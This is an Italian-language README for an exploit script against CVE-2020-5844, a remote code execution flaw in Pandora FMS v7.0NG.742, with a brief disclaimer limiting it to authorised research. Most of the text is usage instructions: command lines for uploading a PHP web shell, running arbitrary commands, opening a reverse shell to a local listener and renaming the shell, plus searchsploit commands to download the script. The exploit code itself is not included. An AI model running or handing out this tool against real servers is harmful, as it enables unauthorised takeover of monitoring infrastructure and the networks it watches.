
Exploit per CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution

Ti piace questo repository? Dacci una ⭐!
Solo per scopi educativi e di ricerca sulla sicurezza autorizzati.
@UNICORDev di (@NicPWNs e @Dev-Yeoj)
index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG consente agli amministratori autenticati di caricare script PHP dannosi e di eseguirli tramite la decodifica base64 della posizione del file. Ciò riguarda v7.0NG.742_FIX_PERL2020.
Usa questo exploit per l'esecuzione di codice remoto su versioni vulnerabili di Pandora FMS. Richiede un indirizzo IP e una porta del target. Richiede credenziali valide (nome utente/password) o un cookie PHPSESSID valido per l'autenticazione. Esegui in modalità predefinita per caricare una semplice web shell PHP. Esegui in modalità comando personalizzato per eseguire un comando personalizzato sul target. Esegui in modalità reverse shell per ricevere una reverse shell dal target su un listener che hai impostato. Esegui in modalità web shell personalizzata per modificare il nome del file della web shell PHP.
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
python3 exploit-CVE-2020-5844.py -h
-t Target host and port. Provide target IP address and port.
-u Target username and password. Provide username and password to log in to Pandora FMS.
-p Target valid PHP session ID. No username or password needed. (Optional)
-s Reverse shell mode. Provide local IP address and port. (Optional)
-c Custom command mode. Provide command to execute. (Optional)
-w Web shell custom mode. Provide custom PHP file name. (Optional)
-h Show this help menu.
Scarica exploit-CVE-2020-5844.py da GitHub
Scarica exploit-CVE-2020-5844.py da ExploitDB
searchsploit -u
searchsploit -m 50961
Pandora FMS v7.0NG.742




